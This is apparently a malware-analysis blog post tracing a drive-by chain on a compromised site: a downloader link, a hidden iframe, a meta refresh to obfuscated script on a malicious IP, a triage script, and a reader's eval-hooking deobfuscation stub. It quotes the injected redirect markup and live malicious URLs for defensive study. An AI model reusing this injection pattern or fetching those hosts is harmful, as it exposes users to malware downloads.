www.ok2bstr8.com/index_13.html

The page contains a link to http://www.ok2bstr8.com/view.exe

view.exe is a downloader – VT analysis

The URL also has an iframe embedded:

<iframe id="01" src="2.html" frameborder="0" style="display:none"></iframe>

2.html contains a meta refresh (2 second delay) that redirects the hidden frame to the malicious obfuscated JS:

<meta http-equiv="refresh" content="2;URL=http://79.135.167.18/cgi-bin/index.cgi?user2">

The above IP is associated with many domains such as minimal345.com
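As an added example (not part of the original post), a small Node.js triage script that pulls executable links, hidden iframes and meta-refresh targets out of saved HTML and resolves them into the hop chain described above. The two page bodies are constructed here to mirror the snippets quoted in the post; they are not captures of the live site.

```javascript
// Added example (not from the original post): extract the redirect chain
// (exe links, hidden iframes, meta refresh) from saved HTML so it can be
// followed offline. Regex-based on purpose: a browser would also run the
// JS/CSS that rewrites these tags, so treat the output as triage, not a verdict.

// Constructed sample pages modelled on the snippets in the post (not captures).
const SAMPLE_INDEX = `
<html><body>
<a href="http://www.ok2bstr8.com/view.exe">view</a>
<iframe id="01" src="2.html" frameborder="0" style="display:none"></iframe>
</body></html>`;

const SAMPLE_2 = `
<meta http-equiv="refresh" content="2;URL=http://79.135.167.18/cgi-bin/index.cgi?user2">`;

// Read one attribute from a raw tag; attributes may be double, single or unquoted.
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = tag.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function findExeLinks(html) {
  const out = [];
  for (const m of html.matchAll(/<a\b[^>]*>/gi)) {
    const href = attr(m[0], 'href');
    if (href && /\.(exe|scr|com|pif)(\?|$)/i.test(href)) out.push(href);
  }
  return out;
}

function findHiddenIframes(html) {
  const out = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    const style = (attr(tag, 'style') || '').replace(/\s+/g, '').toLowerCase();
    const w = attr(tag, 'width'), h = attr(tag, 'height');
    // "hidden" = display:none, visibility:hidden, or a 0x0 / 1x1 frame
    const hidden = /display:none|visibility:hidden/.test(style) ||
      ((w === '0' || w === '1') && (h === '0' || h === '1'));
    out.push({ src: attr(tag, 'src'), hidden });
  }
  return out;
}

function findMetaRefresh(html) {
  const out = [];
  for (const m of html.matchAll(/<meta\b[^>]*>/gi)) {
    const tag = m[0];
    if (!/http-equiv\s*=\s*["']?refresh/i.test(tag)) continue;
    // content is "<seconds>;URL=<target>"; URL= is case-insensitive and the
    // target is sometimes quoted inside the attribute value.
    const content = attr(tag, 'content') || '';
    const cm = content.match(/^\s*(\d+)\s*;\s*url\s*=\s*['"]?([^'"]+)/i);
    if (cm) out.push({ delay: Number(cm[1]), url: cm[2].trim() });
  }
  return out;
}

// Resolve relative targets (e.g. "2.html") against the page they were found in.
function resolve(base, target) {
  return new URL(target, base).href;
}

// pages: { url: html } map; returns the ordered list of hops found.
function triage(pages) {
  const hops = [];
  for (const [url, html] of Object.entries(pages)) {
    for (const href of findExeLinks(html)) {
      hops.push({ from: url, to: resolve(url, href), via: 'exe-link' });
    }
    for (const f of findHiddenIframes(html)) {
      if (f.hidden && f.src) hops.push({ from: url, to: resolve(url, f.src), via: 'hidden-iframe' });
    }
    for (const r of findMetaRefresh(html)) {
      hops.push({ from: url, to: resolve(url, r.url), via: `meta-refresh:${r.delay}s` });
    }
  }
  return hops;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(triage({
    'http://www.ok2bstr8.com/index_13.html': SAMPLE_INDEX,
    'http://www.ok2bstr8.com/2.html': SAMPLE_2,
  }));
}
```

Save each hop's body with wget or curl (never a browser) and feed it back through triage until the chain ends in a script or binary; iframes hidden by CSS classes or injected by JavaScript will not show up here and need the eval-hook approach used further down.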


2 Responses to “www.ok2bstr8.com/index_13.html”

  1. Hello, wondering if you’ve been able to decode the new script being used by asprox. Sample @ http://92prt.ru/cgi-bin/index.cgi?script

    I have not been able to do so using spider monkey wondering if you’ve done some analysis on this before.

    Thanks,

  2. First, strip the HTML entities off the "index.cgi?script" content.

    Second, create a stub file, stub.js, with the following contents:
    // print each layer instead of executing it
    function eval(a) { print(a); }
    // minimal browser objects the script fingerprints
    location = new Object();
    location.href = "http://92prt.ru/cgi-bin/index.cgi?script";
    document = { write: print };
    navigator = new Object();
    navigator.appMinorVersion = ";SP2;";
    navigator.systemLanguage = "en-us";

    Then issue the command "js -f stub.js index.cgi\?script"
